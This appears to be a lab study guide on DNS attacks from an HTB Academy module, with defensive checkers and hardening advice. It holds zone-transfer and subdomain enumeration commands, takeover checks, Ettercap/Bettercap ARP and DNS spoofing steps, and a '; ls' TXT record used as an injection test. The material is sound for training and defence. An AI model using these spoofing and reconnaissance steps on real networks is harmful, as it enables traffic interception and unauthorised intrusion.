# DNS Attacks

## Overview

This document covers exploitation techniques against DNS services, focusing on practical attack methodologies from HTB Academy's "Attacking Common Services" module. DNS attacks can lead to information disclosure, domain takeover, traffic redirection, and man-in-the-middle attacks.

> "The Domain Name System (DNS) translates domain names (e.g., hackthebox.com) to the numerical IP addresses (e.g., 104.17.42.72). Since nearly all network applications use DNS, attacks against DNS servers represent one of the most prevalent and significant threats today."
## DNS Attack Methodology

### Attack Chain Overview

Service Discovery → Zone Transfer Exploitation → Subdomain Enumeration → Domain Takeover → DNS Spoofing

### Key Attack Objectives

- DNS zone transfers for information gathering
- Subdomain enumeration to expand attack surface
- Domain/subdomain takeover for content control
- DNS cache poisoning for traffic redirection
- DNS spoofing for man-in-the-middle attacks
## Service Discovery & Enumeration

### Default DNS Port Detection

```bash
# Default DNS ports: UDP/53, TCP/53
# HTB Academy enumeration example
nmap -p53 -Pn -sV -sC 10.10.110.213

# Expected output
PORT   STATE SERVICE VERSION
53/tcp open  domain  ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
```

### Comprehensive DNS Scanning

```bash
# Full DNS service enumeration (quote the script glob so the shell does not expand it)
nmap -p53 -sU -sV --script "dns-*" 10.10.110.213

# DNS version detection
nmap -p53 --script dns-nsid 10.10.110.213

# DNS recursion check
nmap -p53 --script dns-recursion 10.10.110.213
```

### Key Information to Extract

- DNS server software (BIND, Microsoft DNS, etc.)
- Version information for vulnerability research
- Zone information (SOA records)
- Recursion capabilities
- DNS security features (DNSSEC status)
## DNS Zone Transfer Attacks

### Understanding Zone Transfers

- DNS Zone Transfer = copy of the DNS database from one server to another
- Default behavior: no authentication required
- Risk: complete DNS namespace disclosure
- Protocol: uses TCP/53 for reliable transmission

### HTB Academy Zone Transfer Example
#### Using DIG for AXFR

```bash
# HTB Academy zone transfer attack
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb

# Expected successful output
; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefrieght.htb @10.129.110.213
;; global options: +cmd
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
inlanefrieght.htb. 604800 IN AAAA ::1
inlanefrieght.htb. 604800 IN NS localhost.
inlanefrieght.htb. 604800 IN A 10.129.110.22
admin.inlanefrieght.htb. 604800 IN A 10.129.110.21
hr.inlanefrieght.htb. 604800 IN A 10.129.110.25
support.inlanefrieght.htb. 604800 IN A 10.129.110.28
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.129.110.213#53(10.129.110.213)
;; WHEN: Mon Oct 11 17:20:13 EDT 2020
;; XFR size: 8 records (messages 1, bytes 289)
```

#### Alternative Zone Transfer Methods
```bash
# Using nslookup (the interactive "ls -d" zone listing is only implemented in
# the Windows nslookup; BIND's nslookup on Linux has no "ls" command)
nslookup
> server ns1.inlanefreight.htb
> set type=any
> ls -d inlanefreight.htb

# Using host command
host -t axfr inlanefreight.htb ns1.inlanefreight.htb

# Using dnsrecon
dnsrecon -d inlanefreight.htb -t axfr
```

#### Fierce for Comprehensive DNS Analysis
```bash
# HTB Academy Fierce example
fierce --domain zonetransfer.me

# Expected rich output
NS: nsztm2.digi.ninja. nsztm1.digi.ninja.
SOA: nsztm1.digi.ninja. (81.4.108.41)
Zone: success
{<DNS name @>: '@ 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 '
'172800 900 1209600 3600\n'
'@ 300 IN HINFO "Casio fx-700G" "Windows XP"\n'
'@ 301 IN TXT '
'"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA"\n'
'@ 7200 IN MX 0 ASPMX.L.GOOGLE.COM.\n'
<DNS name _acme-challenge>: '_acme-challenge 301 IN TXT '
'"6Oa05hbUJ9xSsvYy7pApQvwCUSSGgxvrbdizjePEsZI"',
<DNS name cmdexec>: 'cmdexec 300 IN TXT "; ls"',
<DNS name contact>: 'contact 2592000 IN TXT "Remember to call or email Pippa '
'on +44 123 4567890 or pippa@zonetransfer.me when making '
'DNS changes"',
<DNS name email>: 'email 2222 IN NAPTR 1 1 "P" "E2U+email" "" '
'email.zonetransfer.me\n'
'email 7200 IN A 74.125.206.26',
```

## Subdomain Enumeration & Domain Takeover
### Subdomain Discovery Techniques

#### HTB Academy Subfinder Example

```bash
# Subdomain enumeration with Subfinder
./subfinder -d inlanefreight.com -v

# Expected output
_ __ _ _
____ _| |__ / _(_)_ _ __| |___ _ _
(_-< || | '_ \ _| | ' \/ _ / -_) '_|
/__/\_,_|_.__/_| |_|_||_\__,_\___|_| v2.4.5
projectdiscovery.io
[INF] Enumerating subdomains for inlanefreight.com
[alienvault] www.inlanefreight.com
[dnsdumpster] ns1.inlanefreight.com
[dnsdumpster] ns2.inlanefreight.com
[bufferover] support.inlanefreight.com
[INF] Found 4 subdomains for inlanefreight.com in 20 seconds 11 milliseconds
```

#### Subbrute for Internal Networks
```bash
# HTB Academy Subbrute setup for internal use
git clone https://github.com/TheRook/subbrute.git
cd subbrute
echo "ns1.inlanefreight.com" > ./resolvers.txt

# DNS brute-forcing with custom resolvers
./subbrute inlanefreight.com -s ./names.txt -r ./resolvers.txt

# Output shows discovered subdomains
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.com
ns2.inlanefreight.com
www.inlanefreight.com
ms1.inlanefreight.com
support.inlanefreight.com
```

### Domain Takeover Attacks
#### Understanding Subdomain Takeover

- CNAME Record: sub.target.com → anotherdomain.com
- Risk: if anotherdomain.com expires and is re-registered
- Result: attacker controls sub.target.com content
- Common Targets: AWS S3, GitHub Pages, Heroku, Fastly

#### HTB Academy Takeover Example
```bash
# Check for vulnerable CNAME records
host support.inlanefreight.com

# Vulnerable response
support.inlanefreight.com is an alias for inlanefreight.s3.amazonaws.com

# Test for takeover vulnerability
curl https://support.inlanefreight.com

# Error indicating potential takeover
<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket 'inlanefreight' does not exist</Message>
</Error>
```

#### Subdomain Takeover Detection Tools
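A small checker for the dangling-CNAME condition described above, added here as an example (it is not HTB Academy's code or one of the tools listed). It takes observations gathered about your own zone (each CNAME, whether its target still resolves, and the body the alias serves) and flags the entries a defender must remove or re-claim. The S3 `NoSuchBucket` body is the one shown above; the GitHub Pages and Heroku strings are assumed from the can-i-take-over-xyz fingerprints, and the sample hosts are constructed.

```python
import re
from dataclasses import dataclass

# Fingerprints: CNAME target suffix plus the body the provider serves when nothing
# is bound to the hostname. S3 is the NoSuchBucket error shown above; the GitHub
# Pages and Heroku strings are assumed from can-i-take-over-xyz.
FINGERPRINTS = {
    "AWS S3": ("amazonaws.com", re.compile(r"<Code>NoSuchBucket</Code>")),
    "GitHub Pages": ("github.io", re.compile(r"There isn't a GitHub Pages site here")),
    "Heroku": ("herokuapp.com", re.compile(r"No such app", re.I)),
}

@dataclass
class CnameObservation:
    name: str       # subdomain in our own zone
    target: str     # CNAME target as returned by host/dig
    resolves: bool  # does the target name still resolve?
    body: str       # HTTP body fetched via the alias ("" if nothing answered)

def classify(obs):
    """Return (status, provider) for one CNAME observation."""
    target = obs.target.rstrip(".").lower()
    provider = next((p for p, (suffix, _) in FINGERPRINTS.items()
                     if target.endswith(suffix)), None)
    if not obs.resolves:
        # Target name is gone: whoever registers it will serve obs.name
        return "dangling", provider or "unknown provider"
    if provider and FINGERPRINTS[provider][1].search(obs.body):
        # Provider reports nothing bound to this hostname: claimable by anyone
        return "takeover-candidate", provider
    return ("ok", provider) if provider else ("review", "unknown provider")

def audit(observations):
    """Keep only the entries a defender must act on."""
    rows = [(o.name, *classify(o)) for o in observations]
    return [r for r in rows if r[1] in ("dangling", "takeover-candidate")]

# Constructed sample observations (hosts and bodies are made up for the demo)
SAMPLE = [
    CnameObservation("support.inlanefreight.com", "inlanefreight.s3.amazonaws.com.", True,
                     "<Error><Code>NoSuchBucket</Code><Message>The specified bucket "
                     "'inlanefreight' does not exist</Message></Error>"),
    CnameObservation("www.inlanefreight.com", "inlanefreight.s3.amazonaws.com.", True,
                     "<html>welcome</html>"),
    CnameObservation("docs.inlanefreight.com", "inlanefreight.github.io.", True,
                     "<p>There isn't a GitHub Pages site here.</p>"),
    CnameObservation("old.inlanefreight.com", "retired-vendor.example.", False, ""),
]
```

Calling `audit(SAMPLE)` returns the three rows that need action; the `www` entry is a healthy S3 alias and is left out.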
```bash
# Using SubOver (a Go tool; -l takes a file with one subdomain per line)
./SubOver -l subdomains.txt

# Using can-i-take-over-xyz repository guidelines
# Check: https://github.com/EdOverflow/can-i-take-over-xyz
# Common vulnerable services:
# - AWS S3 buckets
# - GitHub Pages
# - Heroku apps
# - Azure websites
# - Fastly CDN
```

## DNS Spoofing & Cache Poisoning
### Understanding DNS Cache Poisoning

- Goal: alter legitimate DNS records with false information
- Methods:
  1. MITM attacks intercepting DNS traffic
  2. Exploitation of DNS server vulnerabilities
  3. Local network cache poisoning
- Result: traffic redirection to malicious servers

### HTB Academy Ettercap DNS Spoofing
**Step 1: Configure DNS Spoofing**

```bash
# Edit Ettercap DNS configuration
cat /etc/ettercap/etter.dns

# Add spoofing entries
inlanefreight.com A 192.168.225.110
*.inlanefreight.com A 192.168.225.110
```

**Step 2: Execute MITM Attack**
```bash
# Launch Ettercap GUI
ettercap -G

# Steps in Ettercap:
# 1. Hosts > Scan for Hosts
# 2. Add target IP (192.168.152.129) to Target1
# 3. Add gateway IP (192.168.152.2) to Target2
# 4. Plugins > Manage Plugins > dns_spoof
```

**Step 3: Verify DNS Spoofing**
```text
# From victim machine (192.168.152.129)
C:\>ping inlanefreight.com
Pinging inlanefreight.com [192.168.225.110] with 32 bytes of data:
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64

# Browser test shows fake page hosted on 192.168.225.110
```

#### Alternative DNS Spoofing Tools
```bash
# Using Bettercap
bettercap -iface eth0

# Bettercap commands
> set dns.spoof.domains inlanefreight.com
> set dns.spoof.address 192.168.225.110
> dns.spoof on
> arp.spoof on

# Using dnsmasq for local spoofing (a dnsmasq config file takes
# address=/name/ip directives, not hosts-file lines)
echo "address=/inlanefreight.com/192.168.225.110" >> /etc/dnsmasq_spoof.conf
dnsmasq --conf-file=/etc/dnsmasq_spoof.conf
```

## HTB Academy Lab Scenarios
### Scenario 1: DNS Zone Transfer Exploitation

Task: Find all DNS records for the "inlanefreight.htb" domain and submit the flag found as a DNS record.

#### HTB Academy Solution Workflow

**Step 1: Setup Subbrute Tool**

```bash
# Clone subbrute repository
git clone https://github.com/TheRook/subbrute.git && cd subbrute/

# Expected output
Cloning into 'subbrute'...
remote: Enumerating objects: 438, done.
remote: Total 438 (delta 0), reused 0 (delta 0), pack-reused 438
Receiving objects: 100% (438/438), 11.85 MiB | 20.67 MiB/s, done.
Resolving deltas: 100% (216/216), done.
```

**Step 2: Configure DNS Resolver**
```bash
# Add target DNS server IP to resolvers file
echo STMIP > resolvers.txt
# Replace STMIP with actual target IP (e.g., 10.129.137.154)
```

**Step 3: Subdomain Enumeration**
```bash
# Use subbrute with SecLists wordlist
python3 subbrute.py inlanefreight.htb -s /opt/useful/SecLists/Discovery/DNS/namelist.txt -r resolvers.txt

# Expected output
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.htb
helpdesk.inlanefreight.htb
hr.inlanefreight.htb
ns.inlanefreight.htb
```

**Step 4: Zone Transfer on Discovered Subdomains**
```bash
# Perform zone transfer on hr subdomain and search for TXT records
dig axfr hr.inlanefreight.htb @10.129.137.154 | grep "TXT"

# Successful flag extraction
hr.inlanefreight.htb. 604800 IN TXT "HTB{...}"
```

#### Alternative Methods
```bash
# Method 1: Direct zone transfer
dig AXFR @target_dns_server inlanefreight.htb

# Method 2: Using fierce
fierce --domain inlanefreight.htb

# Method 3: Using dnsrecon
dnsrecon -d inlanefreight.htb -t axfr

# Method 4: Check all discovered subdomains
for sub in helpdesk hr ns; do
  echo "=== Checking $sub.inlanefreight.htb ==="
  dig AXFR @target_dns_server "$sub.inlanefreight.htb"
done
```

#### Advanced DNS Reconnaissance
```bash
# Enumerate all record types (many servers refuse or minimise ANY responses, so
# fall back to querying the individual types below)
dig ANY @target_dns_server inlanefreight.htb

# Check for specific record types
dig TXT @target_dns_server inlanefreight.htb
dig MX @target_dns_server inlanefreight.htb
dig NS @target_dns_server inlanefreight.htb
dig PTR @target_dns_server inlanefreight.htb

# Brute force subdomains
gobuster dns -d inlanefreight.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

# Check for zone transfer on discovered subdomains
for sub in $(cat discovered_subdomains.txt); do
  dig AXFR @target_dns_server "$sub.inlanefreight.htb"
done
```

## DNS Attack Checklist
- Discovery & Enumeration
- Information Gathering
- Exploitation Techniques
- Post-Exploitation
## Defense & Mitigation

### DNS Server Hardening

- Disable zone transfers - Restrict AXFR to authorized secondary servers only
- Enable DNSSEC - Cryptographic DNS response validation
- Implement access controls - IP-based query restrictions
- Regular updates - Patch DNS server software
- Rate limiting - Prevent DNS amplification attacks

### Network Security

- DNS filtering - Block malicious domains
- Encrypted DNS - DNS over HTTPS (DoH) or DNS over TLS (DoT)
- Split DNS - Separate internal and external DNS
- DNS monitoring - Unusual query pattern detection
- Cache poisoning protection - Source port randomization

### Monitoring & Detection

- Zone transfer attempts - Log AXFR queries
- Unusual DNS queries - Detect reconnaissance patterns
- DNS response validation - Monitor for spoofed responses
- Subdomain monitoring - Track new subdomain creation
- Certificate transparency - Monitor SSL certificate logs
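To make the "Log AXFR queries" item concrete, here is an added example (not part of the HTB module or any tool named on this page) that scans BIND-style query-log lines for AXFR/IXFR requests and flags clients that are not an authorised secondary, or that sweep many names the way the enumerate-then-transfer loop in the lab scenario does. The log lines are constructed, and `allowed_secondaries` is an assumed allow-list you maintain yourself.

```python
import re
from collections import defaultdict

# BIND query-log lines, both the "client <ip>#<port>" form and the newer
# "client @0x... <ip>#<port>" form; the second pattern matches the refusal
# BIND logs when allow-transfer denies a request.
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[\d.]+)#\d+ \([^)]+\): "
    r"query: (?P<name>\S+) IN (?:AXFR|IXFR)\b"
)
DENIED_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[\d.]+)#\d+ \([^)]+\): "
    r"zone transfer '(?P<zone>[^/]+)/(?:AXFR|IXFR)/IN' denied"
)

def detect_axfr(lines, allowed_secondaries, burst_threshold=3):
    """Return [(client_ip, reason, zones)] for transfer activity worth an alert."""
    zones_by_ip = defaultdict(set)
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            zones_by_ip[m["ip"]].add(m["name"].rstrip("."))
        m = DENIED_RE.search(line)
        if m:  # a denied transfer is still a transfer attempt
            zones_by_ip[m["ip"]].add(m["zone"])
    findings = []
    for ip in sorted(zones_by_ip):
        zones = sorted(zones_by_ip[ip])
        if ip not in allowed_secondaries:
            findings.append((ip, "transfer request from unauthorised client", zones))
        elif len(zones) >= burst_threshold:
            findings.append((ip, "transfer requests against many names", zones))
    return findings

# Constructed sample log: timestamps, addresses and names are made up
SAMPLE_LOG = """\
09-Oct-2024 10:15:01.101 client @0x7f3a1c0b2d40 10.129.110.60#41822 (inlanefreight.htb): query: inlanefreight.htb IN SOA -E(0) (10.129.110.22)
09-Oct-2024 10:15:01.102 client @0x7f3a1c0b2d40 10.129.110.60#41823 (inlanefreight.htb): query: inlanefreight.htb IN AXFR -T (10.129.110.22)
09-Oct-2024 10:15:02.310 client @0x7f3a1c0b2d40 10.129.110.60#41824 (hr.inlanefreight.htb): query: hr.inlanefreight.htb IN AXFR -T (10.129.110.22)
09-Oct-2024 10:15:02.311 client @0x7f3a1c0b2d40 10.129.110.60#41824 (hr.inlanefreight.htb): zone transfer 'hr.inlanefreight.htb/AXFR/IN' denied
09-Oct-2024 10:16:00.000 client @0x7f3a1c0b2d40 10.129.110.2#53122 (inlanefreight.htb): query: inlanefreight.htb IN AXFR -T (10.129.110.22)
09-Oct-2024 10:17:00.000 client @0x7f3a1c0b2d40 10.129.110.2#53123 (www.inlanefreight.htb): query: www.inlanefreight.htb IN A -E(0) (10.129.110.22)
""".splitlines()

if __name__ == "__main__":
    for finding in detect_axfr(SAMPLE_LOG, allowed_secondaries={"10.129.110.2"}):
        print(finding)
```

Ordinary A/SOA lookups never match, so the authorised secondary at 10.129.110.2 produces no finding while the unknown client that tried two zones does.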
## Related Techniques

- Subdomain Enumeration - Information gathering techniques
- Domain Hijacking - Web-based domain attacks
- Man-in-the-Middle - Traffic interception
- Social Engineering - Phishing with spoofed domains
- Network Pivoting - Internal network access
## References

- HTB Academy - Attacking Common Services Module
- RFC 1035 - Domain Names: Implementation and Specification
- OWASP DNS Security - DNS attack vectors and mitigations
- Subfinder Documentation - Subdomain discovery tool
- Ettercap Manual - MITM attack framework
- can-i-take-over-xyz - Subdomain takeover reference
This document provides comprehensive DNS attack methodologies based on HTB Academy's "Attacking Common Services" module, focusing on practical exploitation techniques for penetration testing and security assessment.